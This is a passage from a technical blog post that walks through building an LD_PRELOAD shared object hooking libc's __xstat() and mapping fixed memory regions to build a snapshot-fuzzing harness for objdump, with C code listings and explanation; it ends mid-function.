<span class="c1">// Routine to be called when our shared object is loaded</span>
<span class="n">__attribute__</span><span class="p">((</span><span class="n">constructor</span><span class="p">))</span> <span class="k">static</span> <span class="kt">void</span> <span class="nf">_hook_load</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"** LD_PRELOAD shared object loaded!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>However, if we compile and run that, we don’t ever print and exit, so our hook is not being called. Something is going wrong. Sometimes, file related functions in libc have <code class="language-plaintext highlighter-rouge">64</code> variants, such as <code class="language-plaintext highlighter-rouge">open()</code> and <code class="language-plaintext highlighter-rouge">open64()</code>, that are used somewhat interchangeably depending on configurations and flags. I tried hooking a <code class="language-plaintext highlighter-rouge">stat64()</code> but still had no luck with the hook being reached.</p>

<p>Luckily, I’m not the first person with this problem, there is a <a href="https://stackoverflow.com/questions/5478780/c-and-ld-preload-open-and-open64-calls-intercepted-but-not-stat64">great answer on Stackoverflow about the very issue</a> that describes how libc doesn’t actually export <code class="language-plaintext highlighter-rouge">stat()</code> the same way it does for other functions like <code class="language-plaintext highlighter-rouge">open()</code> and <code class="language-plaintext highlighter-rouge">open64()</code>, instead it exports a symbol called <code class="language-plaintext highlighter-rouge">__xstat()</code> which has a slightly different signature and requires a new argument called <code class="language-plaintext highlighter-rouge">version</code> which is meant to describe which version of <code class="language-plaintext highlighter-rouge">stat struct</code> the caller is expecting. This is supposed to all happen magically under the hood but that’s where we live now, so we have to make the magic happen ourselves. The same rules apply for <code class="language-plaintext highlighter-rouge">lstat()</code> and <code class="language-plaintext highlighter-rouge">fstat()</code> as well, they have <code class="language-plaintext highlighter-rouge">__lxstat()</code> and <code class="language-plaintext highlighter-rouge">__fxstat()</code> respectively.</p>

<p>I found the definitions for the functions <a href="https://refspecs.linuxfoundation.org/LSB_1.1.0/gLSB/baselib-xstat-1.html">here</a>. So we can add the <code class="language-plaintext highlighter-rouge">__xstat()</code> hook to our shared object in place of the <code class="language-plaintext highlighter-rouge">stat()</code> and see if our luck changes. Our code now looks like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/</span>

<span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="c1"> /* printf */</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/stat.h&gt;</span><span class="c1"> /* stat */</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="c1"> /* exit */</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="c1"> /* __xstat, __fxstat */</span><span class="cp">
</span>
<span class="c1">// Filename of the input file we're trying to emulate</span>
<span class="cp">#define FUZZ_TARGET "fuzzme"
</span>
<span class="c1">// Declare a prototype for the real stat as a function pointer</span>
<span class="k">typedef</span> <span class="nf">int</span> <span class="p">(</span><span class="o">*</span><span class="n">__xstat_t</span><span class="p">)(</span><span class="kt">int</span> <span class="n">__ver</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">__filename</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span> <span class="o">*</span><span class="n">__stat_buf</span><span class="p">);</span>
<span class="n">__xstat_t</span> <span class="n">real_xstat</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="c1">// Hook function, objdump will call this stat instead of the real one</span>
<span class="kt">int</span> <span class="nf">__xstat</span><span class="p">(</span><span class="kt">int</span> <span class="n">__ver</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">__filename</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span> <span class="o">*</span><span class="n">__stat_buf</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"** Hit our __xstat() hook!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Routine to be called when our shared object is loaded</span>
<span class="n">__attribute__</span><span class="p">((</span><span class="n">constructor</span><span class="p">))</span> <span class="k">static</span> <span class="kt">void</span> <span class="nf">_hook_load</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"** LD_PRELOAD shared object loaded!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Now if we run our shared object, we get the desired outcome, somewhere, our hook is hit. Now we can help ourselves out a bit and print the filenames being requested by the hook and then actually call the real <code class="language-plaintext highlighter-rouge">__xstat()</code> on behalf of the caller. Now when our hook is hit, we will have to resolve the location of the real <code class="language-plaintext highlighter-rouge">__xstat()</code> by name, so we’ll add a symbol resolving function to our shared object. Our shared object code now looks like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/</span>

<span class="cp">#define _GNU_SOURCE     </span><span class="cm">/* dlsym */</span><span class="cp">
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="c1"> /* printf */</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/stat.h&gt;</span><span class="c1"> /* stat */</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="c1"> /* exit */</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="c1"> /* __xstat, __fxstat */</span><span class="cp">
#include</span> <span class="cpf">&lt;dlfcn.h&gt;</span><span class="c1"> /* dlsym and friends */</span><span class="cp">
</span>
<span class="c1">// Filename of the input file we're trying to emulate</span>
<span class="cp">#define FUZZ_TARGET "fuzzme"
</span>
<span class="c1">// Declare a prototype for the real stat as a function pointer</span>
<span class="k">typedef</span> <span class="nf">int</span> <span class="p">(</span><span class="o">*</span><span class="n">__xstat_t</span><span class="p">)(</span><span class="kt">int</span> <span class="n">__ver</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">__filename</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span> <span class="o">*</span><span class="n">__stat_buf</span><span class="p">);</span>
<span class="n">__xstat_t</span> <span class="n">real_xstat</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="c1">// Returns memory address of *next* location of symbol in library search order</span>
<span class="k">static</span> <span class="kt">void</span> <span class="o">*</span><span class="nf">_resolve_symbol</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">symbol</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Clear previous errors</span>
    <span class="n">dlerror</span><span class="p">();</span>

    <span class="c1">// Get symbol address</span>
    <span class="kt">void</span><span class="o">*</span> <span class="n">addr</span> <span class="o">=</span> <span class="n">dlsym</span><span class="p">(</span><span class="n">RTLD_NEXT</span><span class="p">,</span> <span class="n">symbol</span><span class="p">);</span>

    <span class="c1">// Check for error</span>
    <span class="kt">char</span><span class="o">*</span> <span class="n">err</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
    <span class="n">err</span> <span class="o">=</span> <span class="n">dlerror</span><span class="p">();</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">err</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">addr</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Err resolving '%s' addr: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">symbol</span><span class="p">,</span> <span class="n">err</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>
    
    <span class="k">return</span> <span class="n">addr</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Hook function, objdump will call this stat instead of the real one</span>
<span class="kt">int</span> <span class="nf">__xstat</span><span class="p">(</span><span class="kt">int</span> <span class="n">__ver</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">__filename</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span> <span class="o">*</span><span class="n">__stat_buf</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Print the filename requested</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"** __xstat() hook called for filename: '%s'</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">__filename</span><span class="p">);</span>

    <span class="c1">// Resolve the address of the real __xstat() on demand and only once</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">real_xstat</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">real_xstat</span> <span class="o">=</span> <span class="n">_resolve_symbol</span><span class="p">(</span><span class="s">"__xstat"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Call the real __xstat() for the caller so everything keeps going</span>
    <span class="k">return</span> <span class="n">real_xstat</span><span class="p">(</span><span class="n">__ver</span><span class="p">,</span> <span class="n">__filename</span><span class="p">,</span> <span class="n">__stat_buf</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Routine to be called when our shared object is loaded</span>
<span class="n">__attribute__</span><span class="p">((</span><span class="n">constructor</span><span class="p">))</span> <span class="k">static</span> <span class="kt">void</span> <span class="nf">_hook_load</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"** LD_PRELOAD shared object loaded!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Ok so now when we run this, and we check for our print statements, things get a little spicy.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme &gt; /tmp/output.txt &amp;&amp; grep "** __xstat" /tmp/output.txt
** __xstat() hook called for filename: 'fuzzme'
** __xstat() hook called for filename: 'fuzzme'
</code></pre></div></div>

<p>So now we can have some fun.</p>

<h2 id="__xstat-hook">__xstat() Hook</h2>

<p>So the purpose of this hook will be to lie to objdump and make it think it successfully called <code class="language-plaintext highlighter-rouge">stat()</code> on the input file. Remember, we’re making a snapshot fuzzing harness so our objective is to constantly be creating new inputs and feeding them to objdump through this harness. Most importantly, our harness will need to be able to represent our variable length inputs (which will be stored purely in memory) as files. Each fuzzcase, the file length can change and our harness needs to accommodate that.</p>

<p>My idea at this point was to create a somewhat “legit” <code class="language-plaintext highlighter-rouge">stat struct</code> that would normally be returned for our actual file <code class="language-plaintext highlighter-rouge">fuzzme</code> which is just a copy of <code class="language-plaintext highlighter-rouge">/bin/ls</code>. We can store this <code class="language-plaintext highlighter-rouge">stat struct</code> globally and only update the size field as each new fuzz case comes through. So the timeline of our snapshot fuzzing workflow would look something like:</p>
<ol>
  <li>Our <code class="language-plaintext highlighter-rouge">constructor</code> function is called when our shared object is loaded</li>
  <li>Our <code class="language-plaintext highlighter-rouge">constructor</code> sets up a global “legit” <code class="language-plaintext highlighter-rouge">stat struct</code> that we can update for each fuzzcase and pass back to callers of <code class="language-plaintext highlighter-rouge">__xstat()</code> trying to <code class="language-plaintext highlighter-rouge">stat()</code> our fuzzing target</li>
  <li>The imaginary fuzzer runs objdump to the snapshot location</li>
  <li>Our <code class="language-plaintext highlighter-rouge">__xstat()</code> hook updates the global “legit” <code class="language-plaintext highlighter-rouge">stat struct</code> size field and copies the <code class="language-plaintext highlighter-rouge">stat struct</code> into the caller’s buffer</li>
  <li>The imaginary fuzzer restores the state of objdump to its state at snapshot time</li>
  <li>The imaginary fuzzer copies a new input into the harness and updates the input size</li>
  <li>Our <code class="language-plaintext highlighter-rouge">__xstat()</code> hook is called once again, and we repeat step 4, this process occurs over and over forever.</li>
</ol>
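<p>Step 4 in the list above can be sketched roughly like this. It is only an illustration under assumptions: <code class="language-plaintext highlighter-rouge">fill_fake_stat</code> and its parameters are hypothetical names, and it only patches <code class="language-plaintext highlighter-rouge">st_size</code>, leaving every other field exactly as it was captured for the real file.</p>

```c
#include <assert.h>    /* assert */
#include <stddef.h>    /* size_t */
#include <sys/stat.h>  /* struct stat */
#include <sys/types.h> /* off_t */

// Hypothetical helper: hand the caller a copy of a template stat struct with
// only the size field changed to match the current in-memory input
void fill_fake_stat(const struct stat *tmpl, size_t input_size,
                    struct stat *out) {
    assert(tmpl != NULL && out != NULL);

    // Start from the "legit" values captured for the real file
    *out = *tmpl;

    // Patch in the size of the current fuzzcase
    out->st_size = (off_t)input_size;
}
```

<p>Copying into the caller’s buffer, rather than modifying the template in place, means the template itself never changes between fuzzcases.</p>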

<p>So we’re imagining the fuzzer has some routine like this in pseudocode, even though it’d likely be cross-process and require <code class="language-plaintext highlighter-rouge">process_vm_writev</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>insert_fuzzcase(config.input_location, config.input_size_location, input, input_size) {
  memcpy(config.input_location, input, input_size);
  memcpy(config.input_size_location, &amp;input_size, sizeof(size_t));
}
</code></pre></div></div>
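<p>For a concrete feel, here is a minimal in-process version of that routine in C. It is a sketch under assumptions: the parameter names are made up, the size check against a maximum is an addition that the pseudocode doesn’t have, and a real fuzzer living in another process would need something like <code class="language-plaintext highlighter-rouge">process_vm_writev</code> instead of <code class="language-plaintext highlighter-rouge">memcpy()</code>.</p>

```c
#include <assert.h> /* assert */
#include <stddef.h> /* size_t */
#include <string.h> /* memcpy */

// Hypothetical in-process version of the routine above. input_location and
// input_size_location stand in for the addresses the harness would expose.
// Returns 0 on success, -1 if the input does not fit.
int insert_fuzzcase(void *input_location, size_t *input_size_location,
                    size_t max_input_size, const void *input,
                    size_t input_size) {
    assert(input_location != NULL && input_size_location != NULL);
    assert(input != NULL || input_size == 0);

    // Refuse inputs that would overflow the input buffer
    if (input_size > max_input_size) {
        return -1;
    }

    // Copy the input bytes, then publish the new size
    if (input_size > 0) {
        memcpy(input_location, input, input_size);
    }
    *input_size_location = input_size;

    return 0;
}
```

<p>On failure neither the buffer nor the stored size is touched, so an oversized input can’t leave the harness with a size that disagrees with the buffer contents.</p>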

<p>One important thing to keep in mind is that if the snapshot fuzzer is restoring objdump to its snapshot state every fuzzing iteration, we must be careful not to depend on any global mutable memory. The global <code class="language-plaintext highlighter-rouge">stat struct</code> will be safe since it will be instantiated during the <code class="language-plaintext highlighter-rouge">constructor</code>; however, its size field will be restored to its original value each fuzzing iteration by the fuzzer’s snapshot restore routine.</p>

<p>We will also need a global, recognizable address to store variable mutable global data like the current input’s size. Several snapshot fuzzers have the flexibility to ignore contiguous ranges of memory for restoration purposes. So if we’re able to create some contiguous buffers in memory at recognizable addresses, we can have our imaginary fuzzer ignore those ranges for snapshot restorations. So we need to have a place to store the inputs, as well as information about their size. We would then somehow tell the fuzzer about these locations and when it generated a new input, it would copy it into the input location and then update the current input size information.</p>
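<p>To make the “ignore these ranges” idea a bit more concrete, here is one way an imaginary fuzzer’s restore routine could check whether an address belongs to a range it was told to leave alone. This is purely a sketch: <code class="language-plaintext highlighter-rouge">skip_range_t</code> and <code class="language-plaintext highlighter-rouge">should_skip_restore</code> are hypothetical names and don’t come from any particular fuzzer.</p>

```c
#include <assert.h>  /* assert */
#include <stdbool.h> /* bool */
#include <stddef.h>  /* size_t */
#include <stdint.h>  /* uintptr_t */

// Hypothetical description of a memory range the fuzzer should not restore
typedef struct {
    uintptr_t start;
    size_t len;
} skip_range_t;

// Returns true if addr falls inside any range the restore routine should skip
bool should_skip_restore(const skip_range_t *ranges, size_t count,
                         uintptr_t addr) {
    assert(ranges != NULL || count == 0);

    for (size_t i = 0; i < count; i++) {
        // Subtracting first avoids overflow in start + len
        if (addr >= ranges[i].start && addr - ranges[i].start < ranges[i].len) {
            return true;
        }
    }

    return false;
}
```

<p>The harness would register two such ranges, one for the input buffer and one for the input size, and everything else would get restored as usual.</p>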

<p>So now our constructor has an additional job: set up the input location as well as the input size information. We can do this easily with a call to <code class="language-plaintext highlighter-rouge">mmap()</code> which will allow us to specify an address we want our mapping mapped to with the <code class="language-plaintext highlighter-rouge">MAP_FIXED</code> flag. We’ll also create a <code class="language-plaintext highlighter-rouge">MAX_INPUT_SZ</code> definition so that we know how much memory to map from the input location.</p>

<p>Just by itself, the code for mapping memory space for the inputs themselves and their size information looks like this. Notice that we use <code class="language-plaintext highlighter-rouge">MAP_FIXED</code> and we check the returned address from <code class="language-plaintext highlighter-rouge">mmap()</code> just to make sure the call didn’t succeed but map our memory at a different location:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Map memory to hold our inputs in memory and information about their size</span>
<span class="k">static</span> <span class="kt">void</span> <span class="nf">_create_mem_mappings</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">void</span> <span class="o">*</span><span class="n">result</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

    <span class="c1">// Map the page to hold the input size</span>
    <span class="n">result</span> <span class="o">=</span> <span class="n">mmap</span><span class="p">(</span>
        <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)(</span><span class="n">INPUT_SZ_ADDR</span><span class="p">),</span>
        <span class="k">sizeof</span><span class="p">(</span><span class="kt">size_t</span><span class="p">),</span>
        <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span>
        <span class="n">MAP_PRIVATE</span> <span class="o">|</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_FIXED</span><span class="p">,</span>
        <span class="mi">0</span><span class="p">,</span>
        <span class="mi">0</span>
    <span class="p">);</span>
    <span class="k">if</span> <span class="p">((</span><span class="n">MAP_FAILED</span> <span class="o">==</span> <span class="n">result</span><span class="p">)</span> <span class="o">||</span> <span class="p">(</span><span class="n">result</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Err mapping INPUT_SZ_ADDR, mapped @ %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">result</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Let's actually initialize the value at the input size location as well</span>
    <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

    <span class="c1">// Map the pages to hold the input contents</span>
    <span class="n">result</span> <span class="o">=</span> <span class="n">mmap</span><span class="p">(</span>
        <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)(</span><span class="n">INPUT_ADDR</span><span class="p">),</span>
        <span class="p">(</span><span class="kt">size_t</span><span class="p">)(</span><span class="n">MAX_INPUT_SZ</span><span class="p">),</span>
        <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span>
        <span class="n">MAP_PRIVATE</span> <span class="o">|</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_FIXED</span><span class="p">,</span>
        <span class="mi">0</span><span class="p">,</span>
        <span class="mi">0</span>
    <span class="p">);</span>
    <span class="k">if</span> <span class="p">((</span><span class="n">MAP_FAILED</span> <span class="o">==</span> <span class="n">result</span><span class="p">)</span> <span class="o">||</span> <span class="p">(</span><span class="n">result</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_ADDR</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Err mapping INPUT_ADDR, mapped @ %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">result</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Init the value</span>
    <span class="n">memset</span><span class="p">((</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_ADDR</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="n">MAX_INPUT_SZ</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">mmap()</code> actually maps memory in multiples of whatever the page size is on your system (typically 4096 bytes). So, when we ask for a mapping of <code class="language-plaintext highlighter-rouge">sizeof(size_t)</code> bytes, <code class="language-plaintext highlighter-rouge">mmap()</code> is like: “Hmm, that’s just a page dude” and gives us back a whole page covering <code class="language-plaintext highlighter-rouge">0x1336000 - 0x1337000</code>, not inclusive on the high end.</p>
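
<p>If you want to convince yourself of the page rounding, here is a minimal sketch that is not part of the harness. The helper name <code class="language-plaintext highlighter-rouge">whole_page_is_usable</code> is made up for this illustration, and the sketch lets the kernel pick the address instead of using <code class="language-plaintext highlighter-rouge">MAP_FIXED</code>. It maps a handful of bytes and then touches the last byte of the page:</p>

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE     /* MAP_ANONYMOUS */
#endif
#include <assert.h>     /* assert */
#include <stddef.h>     /* size_t */
#include <sys/mman.h>   /* mmap, munmap */
#include <unistd.h>     /* sysconf */

// Hypothetical helper, for illustration only: map `len` bytes anonymously
// and check that the last byte of the first page can be written and read.
// Returns 1 if it can, 0 if mmap() itself failed.
int whole_page_is_usable(size_t len) {
    long page_sz = sysconf(_SC_PAGESIZE);
    assert(page_sz > 0);

    // We pass -1 as the fd here, which is the portable choice for
    // anonymous mappings
    unsigned char *p = mmap(
        NULL,
        len,
        PROT_READ | PROT_WRITE,
        MAP_PRIVATE | MAP_ANONYMOUS,
        -1,
        0
    );
    if (MAP_FAILED == (void *)p) {
        return 0;
    }

    // Well past `len` when len is tiny, but still inside the mapped page
    p[page_sz - 1] = 0x41;
    int ok = (0x41 == p[page_sz - 1]);

    munmap(p, len);
    return ok;
}
```

<p>Calling <code class="language-plaintext highlighter-rouge">whole_page_is_usable(sizeof(size_t))</code> should return <code class="language-plaintext highlighter-rouge">1</code> without faulting, since the kernel backs the request with a full page.</p>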

<p><strong>Random sidenote: be careful about arithmetic in definitions and macros, as I’ve done here with <code class="language-plaintext highlighter-rouge">MAX_INPUT_SZ</code>. The pre-processor just substitutes your text for the definition keyword, so it’s very easy to ruin some order of operations or even overflow a specific primitive type like <code class="language-plaintext highlighter-rouge">int</code>.</strong></p>
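
<p>As a quick illustration of that sidenote, here is a small sketch. The names <code class="language-plaintext highlighter-rouge">BAD_MAX_SZ</code>, <code class="language-plaintext highlighter-rouge">GOOD_MAX_SZ</code>, <code class="language-plaintext highlighter-rouge">FOUR_GIB</code> and the two helper functions are hypothetical and only exist for this example; the only thing taken from the harness is the habit of wrapping the arithmetic in parentheses:</p>

```c
#include <assert.h>     /* static_assert (C11) */
#include <stddef.h>     /* size_t */

// Hypothetical definitions, for illustration only
#define BAD_MAX_SZ      1024 * 1024         // no parentheses
#define GOOD_MAX_SZ     (1024 * 1024)       // parenthesized, like the harness

// Writing (4 * 1024 * 1024 * 1024) would be evaluated as int and overflow,
// so we force a wider type with a suffix on the first operand
#define FOUR_GIB        (4ULL * 1024 * 1024 * 1024)
static_assert(FOUR_GIB == 4294967296ULL, "FOUR_GIB should be 2^32");

// Expands to `n % 1024 * 1024`, which parses as `(n % 1024) * 1024`
size_t remainder_bad(size_t n) {
    return n % BAD_MAX_SZ;
}

// Expands to `n % (1024 * 1024)`, which is what we meant
size_t remainder_good(size_t n) {
    return n % GOOD_MAX_SZ;
}
```

<p>With an input of <code class="language-plaintext highlighter-rouge">4096</code>, the unparenthesized version evaluates <code class="language-plaintext highlighter-rouge">(4096 % 1024) * 1024</code> and gives back <code class="language-plaintext highlighter-rouge">0</code>, while the parenthesized version gives back <code class="language-plaintext highlighter-rouge">4096</code>.</p>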

<p>Now that we have memory set up for the fuzzer to store inputs and information about the input’s size, we can create that global stat struct. But we actually have a big problem: how can we call into <code class="language-plaintext highlighter-rouge">__xstat()</code> to get our “legit” <code class="language-plaintext highlighter-rouge">stat struct</code> if we have <code class="language-plaintext highlighter-rouge">__xstat()</code> hooked? We would hit our own hook. To circumvent this, we can call <code class="language-plaintext highlighter-rouge">__xstat()</code> with a special <code class="language-plaintext highlighter-rouge">__ver</code> argument that tells the hook it was called from our <code class="language-plaintext highlighter-rouge">constructor</code>. The variable is an <code class="language-plaintext highlighter-rouge">int</code>, so let’s go with <code class="language-plaintext highlighter-rouge">0x1337</code> as the special value. That way, in our hook, if we check <code class="language-plaintext highlighter-rouge">__ver</code> and it’s <code class="language-plaintext highlighter-rouge">0x1337</code>, we know we are being called from the <code class="language-plaintext highlighter-rouge">constructor</code> and we can actually stat our real file and create a global “legit” <code class="language-plaintext highlighter-rouge">stat struct</code>. When I dumped a normal call from objdump to <code class="language-plaintext highlighter-rouge">__xstat()</code>, <code class="language-plaintext highlighter-rouge">__ver</code> always had a value of <code class="language-plaintext highlighter-rouge">1</code>, so we will patch it back to that inside our hook. Now our entire shared object source file should look like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/</span>

<span class="cp">#define _GNU_SOURCE     </span><span class="cm">/* dlsym */</span><span class="cp">
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="c1"> /* printf */</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/stat.h&gt;</span><span class="c1"> /* stat */</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="c1"> /* exit */</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="c1"> /* __xstat, __fxstat */</span><span class="cp">
#include</span> <span class="cpf">&lt;dlfcn.h&gt;</span><span class="c1"> /* dlsym and friends */</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/mman.h&gt;</span><span class="c1"> /* mmap */</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="c1"> /* memset */</span><span class="cp">
</span>
<span class="c1">// Filename of the input file we're trying to emulate</span>
<span class="cp">#define FUZZ_TARGET "fuzzme"
</span>
<span class="c1">// Definitions for our in-memory inputs </span>
<span class="cp">#define INPUT_SZ_ADDR   0x1336000
#define INPUT_ADDR      0x1337000
#define MAX_INPUT_SZ    (1024 * 1024)
</span>
<span class="c1">// Our "legit" global stat struct</span>
<span class="k">struct</span> <span class="n">stat</span> <span class="n">st</span><span class="p">;</span>

<span class="c1">// Declare a prototype for the real stat as a function pointer</span>
<span class="k">typedef</span> <span class="nf">int</span> <span class="p">(</span><span class="o">*</span><span class="n">__xstat_t</span><span class="p">)(</span><span class="kt">int</span> <span class="n">__ver</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">__filename</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span> <span class="o">*</span><span class="n">__stat_buf</span><span class="p">);</span>
<span class="n">__xstat_t</span> <span class="n">real_xstat</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="c1">// Returns memory address of *next* location of symbol in library search order</span>
<span class="k">static</span> <span class="kt">void</span> <span class="o">*</span><span class="nf">_resolve_symbol</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">symbol</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Clear previous errors</span>
    <span class="n">dlerror</span><span class="p">();</span>

    <span class="c1">// Get symbol address</span>
    <span class="kt">void</span><span class="o">*</span> <span class="n">addr</span> <span class="o">=</span> <span class="n">dlsym</span><span class="p">(</span><span class="n">RTLD_NEXT</span><span class="p">,</span> <span class="n">symbol</span><span class="p">);</span>

    <span class="c1">// Check for error</span>
    <span class="kt">char</span><span class="o">*</span> <span class="n">err</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
    <span class="n">err</span> <span class="o">=</span> <span class="n">dlerror</span><span class="p">();</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">err</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">addr</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Err resolving '%s' addr: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">symbol</span><span class="p">,</span> <span class="n">err</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>
    
    <span class="k">return</span> <span class="n">addr</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Hook for __xstat </span>
<span class="kt">int</span> <span class="nf">__xstat</span><span class="p">(</span><span class="kt">int</span> <span class="n">__ver</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">__filename</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span><span class="o">*</span> <span class="n">__stat_buf</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Resolve the real __xstat() on demand and maybe multiple times!</span>
